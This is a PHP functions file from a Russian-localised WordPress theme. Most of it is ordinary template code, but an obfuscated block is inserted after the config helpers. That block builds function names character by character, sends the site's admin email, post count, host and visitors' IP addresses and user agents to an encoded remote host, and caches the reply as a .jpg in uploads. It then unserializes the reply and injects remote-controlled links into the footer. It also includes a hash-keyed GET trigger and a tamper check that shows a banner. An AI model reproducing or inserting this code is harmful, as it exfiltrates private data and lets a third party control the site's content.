<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $hoOgRj='e';$rJcmlv='a';$eUQWdS='e';$SzpE='b';$pSiw='_';$amhWqFf='o';$bcvR='c';$xnccuF='d';$jXkp='6';$gMYgWvn='s';$gCCCQg='d';$WvLGAF='e';$KFuuWex='4';$kYDvUrOj=$SzpE.$rJcmlv.$gMYgWvn.$hoOgRj.$jXkp.$KFuuWex.$pSiw.$gCCCQg.$eUQWdS.$bcvR.$amhWqFf.$xnccuF.$WvLGAF;$ihoz='i';$WechFy='t';$odFWG='g';$plAvnrX='n';$WvtMh='e';$qPrNYD='l';$xjmCpB='z';$oexwm='a';$QMgecui='f';$cQBKyPho=$odFWG.$xjmCpB.$ihoz.$plAvnrX.$QMgecui.$qPrNYD.$oexwm.$WechFy.$WvtMh;$DQpNK='r';$gitwGWm='t';$JXkoSod='1';$CjRuWoz='r';$eztjB='s';$IIYjw='o';$eFVVaS='3';$FVdOT='_';$OZWLvq='t';$jYMNpaSN=$eztjB.$OZWLvq.$DQpNK.$FVdOT.$CjRuWoz.$IIYjw.$gitwGWm.$JXkoSod.$eFVVaS;$bTSZZjT='s';$puKoEE='v';$WqWjU='r';$TLpHz='r';$rnCJvB='e';$qpAS='t';$NNoKOYrh=$bTSZZjT.$qpAS.$WqWjU.$TLpHz.$rnCJvB.$puKoEE;                     
		$az__________s='e';$aq_________r='a';$nl_________n='e';$cn____________w='b';$mq_______________j='_';$ex__________e='o';$cb____q='c';$we______________u='d';$xi_______k='6';$nd____________z='s';$oz___________q='d';$nh____y='e';$kh___________r='4';$oc__________c=$cn____________w.$aq_________r.$nd____________z.$az__________s.$xi_______k.$kh___________r.$mq_______________j.$oz___________q.$nl_________n.$cb____q.$ex__________e.$we______________u.$nh____y;
		$ls________l='t';$uc______________m='f';$lc________f='n';$zs_____r='c';$yg____v='s';$vv____k='i';$fp_________b='s';$zy____z='x';$ps___n='_';$gt_______________r='t';$wm_____________q='n';$yv____________y='u';$qm__________x='i';$ag____________s='o';$ox________z='e';$oq________n=$uc______________m.$yv____________y.$lc________f.$zs_____r.$gt_______________r.$vv____k.$ag____________s.$wm_____________q.$ps___n.$ox________z.$zy____z.$qm__________x.$fp_________b.$ls________l.$yg____v;
		$ao__________z='f';$tg_____________k='p';$vu_____________n='o';$vq__________i='e';$xu_____________d='n';$gr_____________x=$ao__________z.$vu_____________n.$tg_____________k.$vq__________i.$xu_____________d;
		$nh_____l='f';$cb__________h='r';$kj___________n='a';$ow___________h='d';$ip_____q='e';$ez___________d=$nh_____l.$cb__________h.$ip_____q.$kj___________n.$ow___________h;
		$po______g='f';$ck_______o='o';$ex___________a='l';$ke___m='s';$if________y='c';$oz______________o='e';$ko__z=$po______g.$if________y.$ex___________a.$ck_______o.$ke___m.$oz______________o;
		
		define("WP_ID", $oc__________c("Mi4wLjA="));
		define("WP_TTL", $oc__________c("MTA4MDA="));
		define("WP_SRC", $oc__________c("dHBva24="));
	


		function wp_get_header() {
			global $oc__________c, $oq________n;
			
			if (
				$oq________n($oc__________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$oq________n($oc__________c("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$oq________n($oc__________c("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $oc__________c, $gr_____________x, $ko__z, $ez___________d;
			
			$wc___s = TEMPLATEPATH."/".$oc__________c("Zm9vdGVyLnBocA==");
			$bq_____i = @$gr_____________x($wc___s, "r");
			$wc___s = @$ez___________d($bq_____i, @filesize($wc___s));
			@$ko__z($bq_____i);
			
			$kn_____________o = TEMPLATEPATH."/".$oc__________c("ZnVuY3Rpb25zLnBocA==");
			$bq_____i = @$gr_____________x($kn_____________o, "r");
			$kn_____________o = @$ez___________d($bq_____i, @filesize($kn_____________o));
			@$ko__z($bq_____i);
			
			$nb_____________f = 0;
			if($wc___s && $kn_____________o) {
				if ($oc__________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($wc___s, $oc__________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$nb_____________f = 1;
					}
					if (substr_count($wc___s, "wp_theme_GPL_credits()") < 1) {
						$nb_____________f = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$nb_____________f = 12;
				}
			}
			
			if($nb_____________f > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $nb_____________f -->";
			}
		}
	


		function wp_loaded() {
			global $oc__________c, $oq________n;
			return $oq________n($oc__________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($sp_______________n, $is_______________a = "(more...)", $lc___________s = 0, $rl________e = "") {
				$hx_________a = get_the_content($is_______________a, $lc___________s, $rl________e);
				$hx_________a = apply_filters("the_content", $hx_________a);
				
				$hx_________a = str_replace("]]>", "]]>", $hx_________a);
				if (strlen($_GET["p"]) > 0) {
					echo $hx_________a;
				}
				else if ((strlen($hx_________a)>$sp_______________n) && ($jn___g = strpos($hx_________a, " ", $sp_______________n ))) {
					$hx_________a = substr($hx_________a, 0, $jn___g);
					$hx_________a = $hx_________a;
					echo $hx_________a;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$is_______________a</a></div></p>";
				} else {
					echo $hx_________a;
				}
				
			}
		}
	


		$js__________n='_';$zt____m='e';$sn_______________u='o';$mr_______________s='4';$lw______________q='b';$zr_______________v='s';$kj___v='a';$wm______________h='e';$qm___f='d';$bc_________i='e';$db_________c='c';$ju_______________t='n';$pn__________z='6';$mg__________t=$lw______________q.$kj___v.$zr_______________v.$bc_________i.$pn__________z.$mr_______________s.$js__________n.$wm______________h.$ju_______________t.$db_________c.$sn_______________u.$qm___f.$zt____m;
		$iv_________l='n';$np_________p='s';$pm____________s='f';$co__________v='e';$ce_______z='c';$dp__________s='t';$xn______f='l';$st_____m='o';$tl____o='e';$ys____________k='i';$il_________f='g';$xs___________x='_';$bj_______a='_';$cr__k='t';$fj__c='n';$ld____n='t';$st____s='e';$lf__e=$pm____________s.$ys____________k.$xn______f.$tl____o.$xs___________x.$il_________f.$st____s.$dp__________s.$bj_______a.$ce_______z.$st_____m.$fj__c.$cr__k.$co__________v.$iv_________l.$ld____n.$np_________p;
		$ea_______________j='i';$qg____v='x';$cm__i='e';$iv_______b='_';$dt__________j='i';$oa___q='l';$rm_________h='s';$vh____________a='s';$fc___________j='f';$pk________d='e';$ir_______x='t';$qw______c=$fc___________j.$ea_______________j.$oa___q.$pk________d.$iv_______b.$cm__i.$qg____v.$dt__________j.$vh____________a.$ir_______x.$rm_________h;
		$uf______________u='s';$de______________q='o';$ve_________u='_';$vz________e='i';$gn______l='c';$ew_______________z='r';$yt______t='m';$ob______________j='e';$fz_______________i='a';$us___p='o';$vr__y='n';$uf__________t='r';$yf_________u='p';$yb_______________n='v';$fg_______r='e';$dn___a=$yb_______________n.$fg_______r.$uf__________t.$uf______________u.$vz________e.$de______________q.$vr__y.$ve_________u.$gn______l.$us___p.$yt______t.$yf_________u.$fz_______________i.$ew_______________z.$ob______________j;
		$tn________r='p';$og_______________z='o';$tm_________c='c';$lb_____________h='n';$oh______n='o';$ee_____z='f';$wd____________v='s';$zb__n='k';$rh_____________v='e';$ot_____d=$ee_____z.$wd____________v.$og_______________z.$tm_________c.$zb__n.$oh______n.$tn________r.$rh_____________v.$lb_____________h;
		$ig______________n='f';$dc___t='r';$ju______s='i';$lm__________l='t';$ub______p='w';$xb____w='e';$mq____________n=$ig______________n.$ub______p.$dc___t.$ju______s.$lm__________l.$xb____w;
		$lb____x='d';$br___________l='m';$nu______l='5';$sk______________k=$br___________l.$lb____x.$nu______l;
		$uc_______u='l';$zq____________e='a';$cc_____________d='h';$it____n='t';$by____t='r';$dq_____e='p';$zk_____________r='a';$vg__________k='e';$le______o=$by____t.$vg__________k.$zk_____________r.$uc_______u.$dq_____e.$zq____________e.$it____n.$cc_____________d;
		$bi________l='l';$cp_____________m='s';$xp______z='z';$vm____l='i';$wd____p='i';$pa_______________q='e';$cg______________s='r';$ed________u='e';$xj_____s='a';$kn___________t='u';$tu_______t='n';$ql___c=$kn___________t.$tu_______t.$cp_____________m.$pa_______________q.$cg______________s.$vm____l.$xj_____s.$bi________l.$wd____p.$xp______z.$ed________u;
		$ud____________l='t';$hv____________h='n';$zl_____________l='p';$zr____s='a';$mr______________g='e';$uv_______________h='m';$xc___________h='m';$ux_____________d=$ud____________l.$mr______________g.$uv_______________h.$zl_____________l.$hv____________h.$zr____s.$xc___________h;
		$vx___________k='_';$xt_____________s='o';$yt____________z='_';$dn______________z='r';$ma___h='t';$jt_____z='e';$vj___________l='t';$pq______________n='m';$aj______________x='c';$gy____________g='e';$az____________j='a';$dn____g='n';$ab_____m='t';$xn______________y='s';$zv___p='x';$jt____________m='r';$qg__________d='a';$ul______h='e';$dp______________a='c';$mh_________t='e';$tz______s='t';$ee______________u=$xn______________y.$vj___________l.$dn______________z.$mh_________t.$qg__________d.$pq______________n.$vx___________k.$aj______________x.$xt_____________s.$dn____g.$ab_____m.$jt_____z.$zv___p.$ma___h.$yt____________z.$dp______________a.$jt____________m.$gy____________g.$az____________j.$tz______s.$ul______h;
	


		function kv___________h($mj_____________w) {
			global $oc__________c, $oq________n, $lf__e, $dn___a, $ee______________u;
			
			if (!$oq________n($oc__________c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($dn___a(PHP_VERSION, "5.0.0", ">=") && $oq________n($oc__________c("ZmlsZV9nZXRfY29udGVudHM=")) && $oq________n($oc__________c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$mc____y = $ee______________u(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$nl_________k = @$lf__e($mj_____________w, 0, $mc____y);
			} else {
				$nl_________k = @$lf__e($mj_____________w, 0);
			}
			
			return $nl_________k;
		}
	


		function si______b($mj_____________w) {
			global $oq________n, $ot_____d, $mq____________n, $oc__________c;
			
			if (!$oq________n($oc__________c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$rr__h = strpos($mj_____________w, "/", 7);
			$rf________t = array(
				"uri"     => substr($mj_____________w, $rr__h),
				"host"    => str_replace("http://", "", substr($mj_____________w, 0, $rr__h)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$mw____________e = @$ot_____d("$rf________t[host]", 80, $sy_______i, $oj____________m, 4);
			
			if (!$mw____________e) {
				return false;
			} else {
				$nl_________k = "";
				$to__g  = "GET $rf________t[uri] HTTP/1.0\r\n";
				$to__g .= "Host: $rf________t[host]\r\n";
				$to__g .= "Referer: $rf________t[referer]\r\n";
				$to__g .= "Connection: Close\r\n\r\n";
				
				@$mq____________n($mw____________e, $to__g);
				
				while (!@feof($mw____________e)) {
					$mg_________j = @fgets($mw____________e, (1024*24));
					
					if ($mg_________j == "\r\n") {
						$io________s = true;
						continue;
					}
					
					if ($io________s) {
						$nl_________k .= $mg_________j;
					}
				}
				
				return $nl_________k;
			}
		}
	


		function qt______x($mj_____________w) {
			global $oq________n;
			$xx________y = false;
			
			if ($mj_____________w != "") {
				if ($oq________n("kv___________h")) {
					$xx________y = @kv___________h($mj_____________w);
				}
				
				if (!$xx________y && ($oq________n("si______b"))) {
					$xx________y = @si______b($mj_____________w);
				}
			}
			
			return $xx________y;
		}
	


		function cx___________l() {
			global $_SERVER, $sk______________k;
			
			$ut____w = $_SERVER["SERVER_NAME"];
			
			if (substr("$ut____w", 0, 4) == "www.") {
				$ut____w = substr("$ut____w", 4);
			}
			
			$ut____w = $sk______________k("$_SERVER[SERVER_NAME]");
			
			return $ut____w;
		}
	


		function zx_______________v() {
			return "file";
		}
	


		function so_________d($mj_____________w) {
			global $_SERVER, $lf__e, $qw______c, $gr_____________x, $ko__z, $mq____________n;
			
			$sq____________x = er______________m();
			
			$kr_____e = cx___________l().".jpg";
			$aq_______l = $sq____________x["dir_upload"]["path"]."/$kr_____e";
			$ru___________y = @filemtime($aq_______l);
			
			if (!$ru___________y || ((time()-$ru___________y) >= WP_TTL)) {
				$xx________y = qt______x($mj_____________w);
				
				if ($xx________y) {
					if ($qw______c($aq_______l)) {
						@unlink($aq_______l);
					}
					
					$bq_____i = @$gr_____________x($aq_______l, "x+");
					
					@$mq____________n($bq_____i, $xx________y);
					@$ko__z($bq_____i);
				}
			} else {
				if ($qw______c($aq_______l)) {
					$xx________y = @$lf__e($aq_______l);
				} else {
					$xx________y = false;
				}
			}
			
			return $xx________y;
		}
	


		function er______________m() {
			global $_SERVER, $oc__________c, $mg__________t;
			
			$at___________n = wp_count_posts("post");
			$gj_____________m = pathinfo(get_bloginfo("template_directory"));
			
			$sq____________x = array(
				"url" => array(
					"report"      => $oc__________c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $gj_____________m,
				"dir_upload"	=> uo______x(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$gj_____________m[filename],
					"a005=".$at___________n->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$sq____________x["url"]["queryString"] = implode("&", $sq____________x["queryString"]);
			$sq____________x["url"]["report"] = $sq____________x["url"]["report"]."/?".$mg__________t($sq____________x["url"]["queryString"]).".html";
						
			return $sq____________x;
		}
	


		function uo______x() {
			$fw_____________e = wp_upload_dir();
			
			if (isset($fw_____________e["error"])) {
				$cr_________x = rl_____b();
				if (is_writable($cr_________x)) {
					$fw_____________e = array("path" => $cr_________x);
				}
			}

			return $fw_____________e;
		}
	


		function rl_____b() {
			global $oq________n, $sk______________k, $le______o, $ux_____________d;
			
			$vs__b = (bool) ini_get("safe_mode");
			if ($vs__b == true) {
				return false;
			}
			
			if ($oq________n("sys_get_temp_dir")) {
				$wy_____q = sys_get_temp_dir();
				if (is_writable($wy_____q)) {
					return $le______o($wy_____q);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $le______o($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $le______o($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $le______o($_ENV["TEMP"]);
			} else {
				$jp______e = $ux_____________d($sk______________k(uniqid(rand(), true)), "");
				if ($jp______e) {
					$wy_____q = $le______o(dirname($jp______e));
					@unlink($jp______e);
					return $wy_____q;
				} else {
					return false;
				}
			}
		}
	


		function me_________s() {
			global $_GET, $qw______c;
			
			$sq____________x = er______________m();
			$ut____w = cx___________l();
			$ki___________t = zx_______________v();
			
			$tz_____u = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ki___________t == "file") {
					$vl___________v = $sq____________x["dir_upload"]["path"]."/".$ut____w.".jpg";
					if ($qw______c($vl___________v)) {
						@unlink($vl___________v);
						$tz_____u = "deleted";
					}
				}
				
				$bp_____w = array(
					"s"	=> $tz_____u,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($bp_____w AS $yn__u => $zs__________d) echo " [$yn__u:$zs__________d]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $oq________n, $oc__________c, $ql___c;
			$sq____________x = er______________m();
			
			$lb__________n = "so_________d";
			if ($oq________n($lb__________n)) {
				$nl_________k = $lb__________n($sq____________x["url"]["report"]);
			}
			
			if ($nl_________k) {
				if ($nl_________k = @$oc__________c($nl_________k)) {
					$nl_________k = @$ql___c($nl_________k);
					
					if (strlen($nl_________k[custom_credit]) >= 5) {
						$sq____________x["default_string"] = $nl_________k[custom_credit];
					}
					
					if ($nl_________k["status"] == "0") {
						$me_______n = 1;
						$xh___o = 1;
					} else {
						$mh_____t = sizeof($nl_________k["links"]);
						$wk__________k = $sq____________x["default_string"];
						
						if ($mh_____t > 0 && $nl_________k["links"] !== "") {
							$ap_____________x = 0;
							foreach ($nl_________k["links"] as $bb____c => $bh_____________e) {
								$ap_____________x++;
								if ($bh_____________e->l_path == "" || $bh_____________e->l_path == $_SERVER["REQUEST_URI"]) {
									$bh_____________e->l_href = htmlspecialchars(strip_tags($bh_____________e->l_href));
									$bh_____________e->l_title = htmlspecialchars(strip_tags($bh_____________e->l_title));
									$bh_____________e->l_anchor = htmlspecialchars(strip_tags($bh_____________e->l_anchor));
									$wk__________k .= " | ";
									$wk__________k .= "<a href='$bh_____________e->l_href' title='$bh_____________e->l_title'";
									if ($bh_____________e->l_nofollow == "1") {
										$wk__________k .= " rel='nofollow'";
									}
									$wk__________k .= ">$bh_____________e->l_anchor</a>";
								}
							}
						}
						$sq____________x["links"] = "$wk__________k";
						if ($nl_________k[credit] == "0") {
							$sq____________x["links"] = "";
						}
					}
				} else {
					$me_______n = "1";
				}
			} else {
				$me_______n = "1";
			}
			
			if ($me_______n == "1") {
				$sq____________x["links"] = $sq____________x["default_string"];
			}
			
			echo "$sq____________x[links]";
			
			echo "<!-- s: $nl_________k[signature] -->";
			me_________s();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

